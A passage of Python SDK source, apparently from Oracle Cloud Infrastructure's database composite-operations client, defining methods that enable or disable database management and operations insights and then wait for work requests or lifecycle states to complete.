raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def deregister_autonomous_database_data_safe_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.deregister_autonomous_database_data_safe` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.deregister_autonomous_database_data_safe`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.deregister_autonomous_database_data_safe(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def disable_autonomous_database_management_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.disable_autonomous_database_management` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.disable_autonomous_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.disable_autonomous_database_management(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def disable_autonomous_database_operations_insights_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.disable_autonomous_database_operations_insights` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.disable_autonomous_database_operations_insights`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.disable_autonomous_database_operations_insights(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def disable_database_management_and_wait_for_work_request(self, database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.disable_database_management` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.disable_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.disable_database_management(database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def disable_database_management_and_wait_for_state(self, database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.disable_database_management` and waits for the :py:class:`~oci.database.models.Database` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.disable_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.disable_database_management(database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def disable_external_container_database_database_management_and_wait_for_work_request(self, external_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.disable_external_container_database_database_management` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_container_database_id: (required)
The ExternalContainerDatabase `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.disable_external_container_database_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.disable_external_container_database_database_management(external_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def disable_external_non_container_database_database_management_and_wait_for_work_request(self, external_non_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.disable_external_non_container_database_database_management` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_non_container_database_id: (required)
The external non-container database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.disable_external_non_container_database_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.disable_external_non_container_database_database_management(external_non_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def disable_external_non_container_database_operations_insights_and_wait_for_work_request(self, external_non_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.disable_external_non_container_database_operations_insights` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_non_container_database_id: (required)
The external non-container database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.disable_external_non_container_database_operations_insights`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.disable_external_non_container_database_operations_insights(external_non_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def disable_external_pluggable_database_database_management_and_wait_for_work_request(self, external_pluggable_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.disable_external_pluggable_database_database_management` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_pluggable_database_id: (required)
The ExternalPluggableDatabaseId `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.disable_external_pluggable_database_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.disable_external_pluggable_database_database_management(external_pluggable_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def disable_external_pluggable_database_operations_insights_and_wait_for_work_request(self, external_pluggable_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.disable_external_pluggable_database_operations_insights` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_pluggable_database_id: (required)
The ExternalPluggableDatabaseId `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.disable_external_pluggable_database_operations_insights`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.disable_external_pluggable_database_operations_insights(external_pluggable_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def enable_autonomous_database_management_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.enable_autonomous_database_management` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.enable_autonomous_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.enable_autonomous_database_management(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def enable_autonomous_database_operations_insights_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.enable_autonomous_database_operations_insights` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.enable_autonomous_database_operations_insights`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.enable_autonomous_database_operations_insights(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def enable_database_management_and_wait_for_work_request(self, database_id, enable_database_management_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.enable_database_management` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.EnableDatabaseManagementDetails enable_database_management_details: (required)
Request to enable the Database Management service for an Oracle Database located in Oracle Cloud Infrastructure.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.enable_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.enable_database_management(database_id, enable_database_management_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def enable_database_management_and_wait_for_state(self, database_id, enable_database_management_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.enable_database_management` and waits for the :py:class:`~oci.database.models.Database` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.EnableDatabaseManagementDetails enable_database_management_details: (required)
Request to enable the Database Management service for an Oracle Database located in Oracle Cloud Infrastructure.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.enable_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.enable_database_management(database_id, enable_database_management_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def enable_external_container_database_database_management_and_wait_for_work_request(self, external_container_database_id, enable_external_container_database_database_management_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.enable_external_container_database_database_management` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_container_database_id: (required)
The ExternalContainerDatabase `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.EnableExternalContainerDatabaseDatabaseManagementDetails enable_external_container_database_database_management_details: (required)
Request to enable the Database Management Service for an external container database.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.enable_external_container_database_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.enable_external_container_database_database_management(external_container_database_id, enable_external_container_database_database_management_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def enable_external_non_container_database_database_management_and_wait_for_work_request(self, external_non_container_database_id, enable_external_non_container_database_database_management_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.enable_external_non_container_database_database_management` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_non_container_database_id: (required)
The external non-container database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.EnableExternalNonContainerDatabaseDatabaseManagementDetails enable_external_non_container_database_database_management_details: (required)
Request to enable the Database Management Service for an external non-container database.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.enable_external_non_container_database_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.enable_external_non_container_database_database_management(external_non_container_database_id, enable_external_non_container_database_database_management_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def enable_external_non_container_database_operations_insights_and_wait_for_work_request(self, external_non_container_database_id, enable_external_non_container_database_operations_insights_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.enable_external_non_container_database_operations_insights` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_non_container_database_id: (required)
The external non-container database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.EnableExternalNonContainerDatabaseOperationsInsightsDetails enable_external_non_container_database_operations_insights_details: (required)
Details to enable Operations Insights on the external non-container database
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.enable_external_non_container_database_operations_insights`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.enable_external_non_container_database_operations_insights(external_non_container_database_id, enable_external_non_container_database_operations_insights_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def enable_external_pluggable_database_database_management_and_wait_for_work_request(self, external_pluggable_database_id, enable_external_pluggable_database_database_management_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.enable_external_pluggable_database_database_management` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_pluggable_database_id: (required)
The ExternalPluggableDatabaseId `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.EnableExternalPluggableDatabaseDatabaseManagementDetails enable_external_pluggable_database_database_management_details: (required)
Request to enable the Database Management Service for an external database.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.enable_external_pluggable_database_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.enable_external_pluggable_database_database_management(external_pluggable_database_id, enable_external_pluggable_database_database_management_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def enable_external_pluggable_database_operations_insights_and_wait_for_work_request(self, external_pluggable_database_id, enable_external_pluggable_database_operations_insights_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.enable_external_pluggable_database_operations_insights` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_pluggable_database_id: (required)
